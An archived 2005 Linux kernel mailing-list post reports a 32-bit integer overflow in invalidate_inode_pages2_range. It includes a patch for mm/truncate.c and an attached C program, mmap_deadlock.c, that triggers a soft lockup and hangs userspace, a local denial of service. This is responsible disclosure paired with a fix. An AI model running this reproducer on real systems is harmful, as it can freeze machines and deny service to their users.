From: Oleg Drokin <green@linuxhacker.ru>
To: linux-kernel@vger.kernel.org, akpm@osdl.org
Subject: 32bit integer overflow in invalidate_inode_pages2() (local DoS)
Date: Wed, 23 Nov 2005 16:57:27 +0200 [thread overview]
Message-ID: <20051123145727.GA21405@linuxhacker.ru> (raw)
[-- Attachment #1: Type: text/plain, Size: 1268 bytes --]
Hello!
Today looking for a way to do atomic page-unmap + removing page from
page cache, I found 32 bit integer overflow in invalidate_inode_pages2_range.
Attached program demonstrates the problem (on x86 with 2.6.14
I quickly get SOFT Lockup trace and after a few seconds entire
userspace locks up (not sure why)).
Seems that all 2.6 kernels are having same problem, 2.6.5 has similar
(though not identical) code.
Please consider this patch below:
--- linux-2.6.14/mm/truncate.c.orig 2005-11-23 16:34:21.000000000 +0200
+++ linux-2.6.14/mm/truncate.c 2005-11-23 16:37:18.000000000 +0200
@@ -291,8 +291,8 @@
* Zap the rest of the file in one hit.
*/
unmap_mapping_range(mapping,
- page_index << PAGE_CACHE_SHIFT,
- (end - page_index + 1)
+ (loff_t)page_index<<PAGE_CACHE_SHIFT,
+ (loff_t)(end - page_index + 1)
<< PAGE_CACHE_SHIFT,
0);
did_range_unmap = 1;
@@ -301,8 +301,8 @@
* Just zap this page
*/
unmap_mapping_range(mapping,
- page_index << PAGE_CACHE_SHIFT,
- PAGE_CACHE_SIZE, 0);
+ (loff_t)page_index<<PAGE_CACHE_SHIFT,
+ PAGE_CACHE_SIZE, 0);
}
}
was_dirty = test_clear_page_dirty(page);
Bye,
Oleg
[-- Attachment #2: mmap_deadlock.c --]
[-- Type: text/plain, Size: 1032 bytes --]
#define _GNU_SOURCE
#define __USE_FILE_OFFSET64
#include <stdio.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#define FILENAME "/tmp/bigfile"
int main(int argc, char **argv)
{
int fd, fd1, ret;
char *buf;
char wbuf[8192];
unsigned long long offset = 0xffffff000ULL;
char *p=wbuf;
fd = open(FILENAME, O_RDWR|O_CREAT|O_LARGEFILE/*|O_TRUNC*/, 0644);
if (fd < 0) {
perror(FILENAME);
return -1;
}
ftruncate64(fd, offset + 4096*4);
buf = mmap64(NULL, 4096*4, PROT_READ|PROT_WRITE, MAP_SHARED, fd, offset);
if (buf == MAP_FAILED) {
perror("mmap");
return -1;
}
fd1 = open(FILENAME, O_RDWR|O_DIRECT|O_LARGEFILE, 0644);
if (fd < 0) {
perror(FILENAME);
return -1;
}
p = (char *)((unsigned long) p | 4095)+1;
if (fork()) {
while(1) {
/* map in the page */
buf[10] = 1;
}
} else {
ret = pwrite64(fd1, p, 4096, offset);
if (ret < 4096) {
printf("write: %d %p\n", ret, p);
perror("write");
return -1;
}
}
return 0;
}
reply other threads:[~2005-11-23 14:58 UTC|newest]
Thread overview: [no followups] expand[flat|nested] mbox.gz Atom feed
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=20051123145727.GA21405@linuxhacker.ru \
--to=green@linuxhacker.ru \
--cc=akpm@osdl.org \
--cc=linux-kernel@vger.kernel.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.